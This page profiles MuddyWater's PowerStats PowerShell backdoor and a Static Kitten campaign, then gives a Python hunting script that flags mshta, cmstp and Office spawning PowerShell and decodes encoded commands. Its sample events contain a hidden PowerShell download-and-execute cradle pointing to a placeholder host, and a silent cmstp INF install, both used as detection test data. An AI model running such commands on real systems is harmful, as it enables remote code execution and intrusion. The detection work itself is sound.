PowerStats is a PowerShell backdoor developed and used by the Iran-linked MuddyWater cyberespionage group. It is typically delivered through phishing emails and malicious downloads and installs without the user's knowledge; once running, it gives the operators remote access to the host and a channel to collect information from it. MuddyWater used PowerStats as its primary backdoor in earlier campaigns, but according to Sekoia's advisory the group later shifted to legitimate remote management software for access.
The PowerStats payload has been executed through a range of living-off-the-land methods, including CMSTP.exe, JavaScript files, mshta.exe, Visual Basic Script (VBS) files, and Office macros. For instance, MuddyWater used mshta.exe not only to execute its PowerStats payload but also to pass a PowerShell one-liner for execution. To obscure the Command and Control (C2) location, MuddyWater controlled PowerStats from behind a proxy network. Alongside PowerStats, the group has developed other malware sets, including PowGoop, Small Sieve, Canopy/Starwhale, and Mori, covering loader, backdoor, persistence, and exfiltration roles.
A new campaign likely attributable to Static Kitten, another name for the MuddyWater group, has been uncovered by Anomali Threat Research. Consistent with previous Static Kitten activity, the campaign's tactics, techniques, and procedures include ScreenConnect launch parameters in which the custom field contains mfa[.]gov, indicating that any Ministry of Foreign Affairs (MOFA) is a target. The group continues to use the PowerStats backdoor, running PowerShell scripts to maintain persistent access to victim systems, and multiple malware sets for its other malicious activities.
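The execution chains above (mshta.exe or cmstp.exe launching PowerShell, encoded one-liners, and a ScreenConnect client carrying an mfa[.]gov custom field) are what a detection engineer would hunt for in process-creation telemetry. The following script is an added example written for this page, not code from MuddyWater, Sekoia, or Anomali: it runs generic LOLBin-to-PowerShell heuristics over a handful of constructed Sysmon-style process-creation records and decodes any `-EncodedCommand` argument so the analyst sees the cleartext one-liner. The event records, paths and the `example.invalid` hosts are made up; the assumption that the ScreenConnect custom field shows up in the client's command line is the author's, not something the page states.

```python
"""Hunting sketch for PowerStats-style delivery chains.

All ProcEvent records below are constructed samples, not real telemetry.
The rules are generic LOLBin heuristics, not vendor signatures.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal Sysmon EventID 1 style record (constructed)."""
    parent_image: str
    image: str
    command_line: str


# Script hosts and Office apps that should rarely be the parent of PowerShell.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmstp.exe",
                "winword.exe", "excel.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _enc(ps: str) -> str:
    """Encode a PowerShell string the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline: str):
    """Return the decoded -e/-ec/-enc/-EncodedCommand payload, or None if absent/invalid."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent) -> list:
    """Apply the heuristics to one event and return the human-readable findings."""
    parent, image = _base(ev.parent_image), _base(ev.image)
    cmd_l = ev.command_line.lower()
    findings = []

    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        findings.append(f"powershell spawned by {parent}")
    if image == "mshta.exe" and any(k in cmd_l for k in ("powershell", "vbscript:", "javascript:")):
        findings.append("mshta executing inline script")
    if image == "cmstp.exe" and "/ni" in cmd_l and "/s" in cmd_l and ".inf" in cmd_l:
        findings.append("cmstp silent INF install")
    if image == "powershell.exe":
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            findings.append("encoded command: " + decoded.strip())
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd_l) or "-nop" in cmd_l:
            findings.append("hidden/NoProfile powershell")
    # Assumption: the ScreenConnect custom field is visible in the command line.
    if "screenconnect" in image and "mfa.gov" in cmd_l:
        findings.append("ScreenConnect client launched with mfa.gov custom field")
    return findings


def scan(events) -> list:
    """Return (image name, findings) for every event that triggered at least one rule."""
    out = []
    for ev in events:
        f = classify(ev)
        if f:
            out.append((_base(ev.image), f))
    return out


# Constructed sample events: one benign, three matching the chains described above.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -e "
              + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/ps')")),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /ni /s C:\Users\Public\config.inf"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\u\Downloads\ScreenConnect.ClientSetup.exe",
              'ScreenConnect.ClientSetup.exe "?e=Access&y=Guest&h=relay.example.invalid&p=8041&c=mfa.gov"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt"),
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image)
        for f in findings:
            print("  -", f)
```

The parent/child pairing is the high-signal rule: PowerShell under mshta.exe, cmstp.exe or an Office process is rare on a managed host, whereas `-w hidden` or `-nop` alone will fire on plenty of legitimate administration scripts and should be treated as a corroborating indicator rather than an alert on its own.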
Description last updated: 2024-07-18T06:15:43.620Z